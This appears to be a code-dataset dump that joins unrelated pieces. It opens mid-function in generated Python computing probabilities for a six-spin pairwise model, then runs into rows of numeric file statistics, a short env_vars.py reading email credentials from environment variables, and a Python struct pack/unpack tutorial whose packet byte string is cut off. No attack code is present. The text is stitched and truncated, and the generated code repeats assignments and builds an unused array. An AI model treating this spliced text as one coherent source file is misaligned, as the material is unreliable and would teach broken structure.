Cout[20] = (+exp(+H[4]+H[5]+J[14])+exp(+H[3]+H[4]+H[5]+J[12]+J[13]+J[14])+exp(+H[2]+H[4]+H[5]+J[10]+J[11]+J[14])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+H[4]+H[5]+J[7]+J[8]+J[14])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[4]+H[5]+J[3]+J[4]+J[14])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14]))/Z
return(Cout)
def p(params):
"""
Give each set of parameters concatenated into one array.
"""
Cout = zeros((21))
H = params[0:6]
J = params[6:21]
H = params[0:6]
J = params[6:21]
Pout = zeros((64))
Z = +exp(+0)+exp(+H[5]+0)+exp(+H[4]+0)+exp(+H[4]+H[5]+J[14])+exp(+H[3]+0)+exp(+H[3]+H[5]+J[13])+exp(+H[3]+H[4]+J[12])+exp(+H[3]+H[4]+H[5]+J[12]+J[13]+J[14])+exp(+H[2]+0)+exp(+H[2]+H[5]+J[11])+exp(+H[2]+H[4]+J[10])+exp(+H[2]+H[4]+H[5]+J[10]+J[11]+J[14])+exp(+H[2]+H[3]+J[9])+exp(+H[2]+H[3]+H[5]+J[9]+J[11]+J[13])+exp(+H[2]+H[3]+H[4]+J[9]+J[10]+J[12])+exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[1]+0)+exp(+H[1]+H[5]+J[8])+exp(+H[1]+H[4]+J[7])+exp(+H[1]+H[4]+H[5]+J[7]+J[8]+J[14])+exp(+H[1]+H[3]+J[6])+exp(+H[1]+H[3]+H[5]+J[6]+J[8]+J[13])+exp(+H[1]+H[3]+H[4]+J[6]+J[7]+J[12])+exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[1]+H[2]+J[5])+exp(+H[1]+H[2]+H[5]+J[5]+J[8]+J[11])+exp(+H[1]+H[2]+H[4]+J[5]+J[7]+J[10])+exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[1]+H[2]+H[3]+J[5]+J[6]+J[9])+exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+0)+exp(+H[0]+H[5]+J[4])+exp(+H[0]+H[4]+J[3])+exp(+H[0]+H[4]+H[5]+J[3]+J[4]+J[14])+exp(+H[0]+H[3]+J[2])+exp(+H[0]+H[3]+H[5]+J[2]+J[4]+J[13])+exp(+H[0]+H[3]+H[4]+J[2]+J[3]+J[12])+exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])+exp(+H[0]+H[2]+J[1])+exp(+H[0]+H[2]+H[5]+J[1]+J[4]+J[11])+exp(+H[0]+H[2]+H[4]+J[1]+J[3]+J[10])+exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])+exp(+H[0]+H[2]+H[3]+J[1]+J[2]+J[9])+exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])+exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])+exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+J[0])+exp(+H[0]+H[1]+H[5]+J[0]+J[4]+J[8])+exp(+H[0]+H[1]+H[4]+J[0]+J[3]+J[7])+exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])+exp(+H[0]+H[1]+H[3]+J[0]+J[2]+J[6])+exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])+exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])+exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])+exp(+H[0]+H[1]+H[2]+J[0]+J[1]+J[5])+exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])+exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])+exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])+exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])+exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])+exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])
Pout[0] = +exp(+0)/Z
Pout[1] = +exp(+H[5]+0)/Z
Pout[2] = +exp(+H[4]+0)/Z
Pout[3] = +exp(+H[4]+H[5]+J[14])/Z
Pout[4] = +exp(+H[3]+0)/Z
Pout[5] = +exp(+H[3]+H[5]+J[13])/Z
Pout[6] = +exp(+H[3]+H[4]+J[12])/Z
Pout[7] = +exp(+H[3]+H[4]+H[5]+J[12]+J[13]+J[14])/Z
Pout[8] = +exp(+H[2]+0)/Z
Pout[9] = +exp(+H[2]+H[5]+J[11])/Z
Pout[10] = +exp(+H[2]+H[4]+J[10])/Z
Pout[11] = +exp(+H[2]+H[4]+H[5]+J[10]+J[11]+J[14])/Z
Pout[12] = +exp(+H[2]+H[3]+J[9])/Z
Pout[13] = +exp(+H[2]+H[3]+H[5]+J[9]+J[11]+J[13])/Z
Pout[14] = +exp(+H[2]+H[3]+H[4]+J[9]+J[10]+J[12])/Z
Pout[15] = +exp(+H[2]+H[3]+H[4]+H[5]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])/Z
Pout[16] = +exp(+H[1]+0)/Z
Pout[17] = +exp(+H[1]+H[5]+J[8])/Z
Pout[18] = +exp(+H[1]+H[4]+J[7])/Z
Pout[19] = +exp(+H[1]+H[4]+H[5]+J[7]+J[8]+J[14])/Z
Pout[20] = +exp(+H[1]+H[3]+J[6])/Z
Pout[21] = +exp(+H[1]+H[3]+H[5]+J[6]+J[8]+J[13])/Z
Pout[22] = +exp(+H[1]+H[3]+H[4]+J[6]+J[7]+J[12])/Z
Pout[23] = +exp(+H[1]+H[3]+H[4]+H[5]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])/Z
Pout[24] = +exp(+H[1]+H[2]+J[5])/Z
Pout[25] = +exp(+H[1]+H[2]+H[5]+J[5]+J[8]+J[11])/Z
Pout[26] = +exp(+H[1]+H[2]+H[4]+J[5]+J[7]+J[10])/Z
Pout[27] = +exp(+H[1]+H[2]+H[4]+H[5]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])/Z
Pout[28] = +exp(+H[1]+H[2]+H[3]+J[5]+J[6]+J[9])/Z
Pout[29] = +exp(+H[1]+H[2]+H[3]+H[5]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])/Z
Pout[30] = +exp(+H[1]+H[2]+H[3]+H[4]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])/Z
Pout[31] = +exp(+H[1]+H[2]+H[3]+H[4]+H[5]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])/Z
Pout[32] = +exp(+H[0]+0)/Z
Pout[33] = +exp(+H[0]+H[5]+J[4])/Z
Pout[34] = +exp(+H[0]+H[4]+J[3])/Z
Pout[35] = +exp(+H[0]+H[4]+H[5]+J[3]+J[4]+J[14])/Z
Pout[36] = +exp(+H[0]+H[3]+J[2])/Z
Pout[37] = +exp(+H[0]+H[3]+H[5]+J[2]+J[4]+J[13])/Z
Pout[38] = +exp(+H[0]+H[3]+H[4]+J[2]+J[3]+J[12])/Z
Pout[39] = +exp(+H[0]+H[3]+H[4]+H[5]+J[2]+J[3]+J[4]+J[12]+J[13]+J[14])/Z
Pout[40] = +exp(+H[0]+H[2]+J[1])/Z
Pout[41] = +exp(+H[0]+H[2]+H[5]+J[1]+J[4]+J[11])/Z
Pout[42] = +exp(+H[0]+H[2]+H[4]+J[1]+J[3]+J[10])/Z
Pout[43] = +exp(+H[0]+H[2]+H[4]+H[5]+J[1]+J[3]+J[4]+J[10]+J[11]+J[14])/Z
Pout[44] = +exp(+H[0]+H[2]+H[3]+J[1]+J[2]+J[9])/Z
Pout[45] = +exp(+H[0]+H[2]+H[3]+H[5]+J[1]+J[2]+J[4]+J[9]+J[11]+J[13])/Z
Pout[46] = +exp(+H[0]+H[2]+H[3]+H[4]+J[1]+J[2]+J[3]+J[9]+J[10]+J[12])/Z
Pout[47] = +exp(+H[0]+H[2]+H[3]+H[4]+H[5]+J[1]+J[2]+J[3]+J[4]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])/Z
Pout[48] = +exp(+H[0]+H[1]+J[0])/Z
Pout[49] = +exp(+H[0]+H[1]+H[5]+J[0]+J[4]+J[8])/Z
Pout[50] = +exp(+H[0]+H[1]+H[4]+J[0]+J[3]+J[7])/Z
Pout[51] = +exp(+H[0]+H[1]+H[4]+H[5]+J[0]+J[3]+J[4]+J[7]+J[8]+J[14])/Z
Pout[52] = +exp(+H[0]+H[1]+H[3]+J[0]+J[2]+J[6])/Z
Pout[53] = +exp(+H[0]+H[1]+H[3]+H[5]+J[0]+J[2]+J[4]+J[6]+J[8]+J[13])/Z
Pout[54] = +exp(+H[0]+H[1]+H[3]+H[4]+J[0]+J[2]+J[3]+J[6]+J[7]+J[12])/Z
Pout[55] = +exp(+H[0]+H[1]+H[3]+H[4]+H[5]+J[0]+J[2]+J[3]+J[4]+J[6]+J[7]+J[8]+J[12]+J[13]+J[14])/Z
Pout[56] = +exp(+H[0]+H[1]+H[2]+J[0]+J[1]+J[5])/Z
Pout[57] = +exp(+H[0]+H[1]+H[2]+H[5]+J[0]+J[1]+J[4]+J[5]+J[8]+J[11])/Z
Pout[58] = +exp(+H[0]+H[1]+H[2]+H[4]+J[0]+J[1]+J[3]+J[5]+J[7]+J[10])/Z
Pout[59] = +exp(+H[0]+H[1]+H[2]+H[4]+H[5]+J[0]+J[1]+J[3]+J[4]+J[5]+J[7]+J[8]+J[10]+J[11]+J[14])/Z
Pout[60] = +exp(+H[0]+H[1]+H[2]+H[3]+J[0]+J[1]+J[2]+J[5]+J[6]+J[9])/Z
Pout[61] = +exp(+H[0]+H[1]+H[2]+H[3]+H[5]+J[0]+J[1]+J[2]+J[4]+J[5]+J[6]+J[8]+J[9]+J[11]+J[13])/Z
Pout[62] = +exp(+H[0]+H[1]+H[2]+H[3]+H[4]+J[0]+J[1]+J[2]+J[3]+J[5]+J[6]+J[7]+J[9]+J[10]+J[12])/Z
Pout[63] = +exp(+H[0]+H[1]+H[2]+H[3]+H[4]+H[5]+J[0]+J[1]+J[2]+J[3]+J[4]+J[5]+J[6]+J[7]+J[8]+J[9]+J[10]+J[11]+J[12]+J[13]+J[14])/Z
return(Pout)
| 294.634783
| 2,643
| 0.435263
| 11,880
| 33,883
| 1.24133
| 0.007997
| 0.168441
| 0.124771
| 0.148098
| 0.971045
| 0.970502
| 0.969621
| 0.959653
| 0.952872
| 0.951583
| 0
| 0.201375
| 0.012927
| 33,883
| 114
| 2,644
| 297.219298
| 0.239557
| 0.004663
| 0
| 0.09901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019802
| false
| 0
| 0.009901
| 0
| 0.029703
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
d217a2385f09b70aa1cd874641638d25c8b9b3fa
| 97
|
py
|
Python
|
env_vars.py
|
mandres2/Cafeblog
|
3547647ce5c03e9428cf659353929954e06ecdc1
|
[
"MIT"
] | null | null | null |
env_vars.py
|
mandres2/Cafeblog
|
3547647ce5c03e9428cf659353929954e06ecdc1
|
[
"MIT"
] | 7
|
2020-06-06T01:47:51.000Z
|
2022-02-10T10:28:10.000Z
|
env_vars.py
|
mandres2/Cafeblog
|
3547647ce5c03e9428cf659353929954e06ecdc1
|
[
"MIT"
] | null | null | null |
import os
EMAIL_USER = os.environ.get('EMAIL_USER')
EMAIL_PASS = os.environ.get('EMAIL_PASS')
| 13.857143
| 41
| 0.742268
| 16
| 97
| 4.25
| 0.4375
| 0.264706
| 0.352941
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113402
| 97
| 6
| 42
| 16.166667
| 0.790698
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.333333
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 7
|
d2419cc5411c343c3eb1d7d174c44fb70f41dc85
| 56,484
|
py
|
Python
|
A2/struct_ex.py
|
ShamsuddohaShameem17/coms3200
|
211df3ea954c33f64cc833772e07e90356baa853
|
[
"MIT"
] | null | null | null |
A2/struct_ex.py
|
ShamsuddohaShameem17/coms3200
|
211df3ea954c33f64cc833772e07e90356baa853
|
[
"MIT"
] | null | null | null |
A2/struct_ex.py
|
ShamsuddohaShameem17/coms3200
|
211df3ea954c33f64cc833772e07e90356baa853
|
[
"MIT"
] | 1
|
2021-05-13T21:09:21.000Z
|
2021-05-13T21:09:21.000Z
|
#Packing information in binary order using struct {pack and unpack}
'''
Format C Type Python type Standard size Notes
x pad byte no value
c char bytes of length 1 1
b signed char integer 1 (1),(3)
B unsigned char integer 1 (3)
? _Bool bool 1 (1)
h short integer 2 (3)
H unsigned short integer 2 (3)
i int integer 4 (3)
I unsigned int integer 4 (3)
l long integer 4 (3)
L unsigned long integer 4 (3)
q long long integer 8 (2), (3)
Q unsigned longlong integer 8 (2), (3)
n ssize_t integer (4)
N size_t integer (4)
e (7) float 2 (5)
f float float 4 (5)
d double float 8 (5)
s char[] bytes
p char[] bytes
P void * integer (6)
'''
from struct import pack, unpack, calcsize
## Packing into binary string from a format
packed_data = pack('iif',2,2,3.4) # int,int,float
# Now packed_data = b'\x02\x00\x00\x00\x02\x00\x00\x00\x9a\x99Y@'
## Unpacking the binary into the format
unpacked_data = unpack('iif', packed_data) #give us (2, 2, 3.4000000953674316)
## We can encode/decode from a list or tuples
data = (2,2,3.4)
packed_data = pack('iif',*data) # Uses splat operator
# Should give b'\x02\x00\x00\x00\x02\x00\x00\x00\x9a\x99Y@'
## Note:Unpacked data cannot be unpacked again . Because it has to be a byte string / binary format
## And wrong format gives wrong result
unpacked_data = unpack('iii', packed_data) #gives (2, 2, 1079613850)
#######################################################################################################################
# ShortField("seq_num", 0),
# ShortField("ack_num", 0),
# BitField("ack_flag", 0, 1),
# BitField("nak_flag", 0, 1),
# BitField("get_flag", 0, 1),
# BitField("dat_flag", 0, 1),
# BitField("fin_flag", 0, 1),
# BitField("reserved", 0, 11),
# BitField("data", 0, PAYLOAD_SIZE_BITS)
newPackedData = b'\x00\x01\x00\x00\x10\x00file.txt\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
# b'\x00\x01\x00\x00\x80\x00file.txt\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\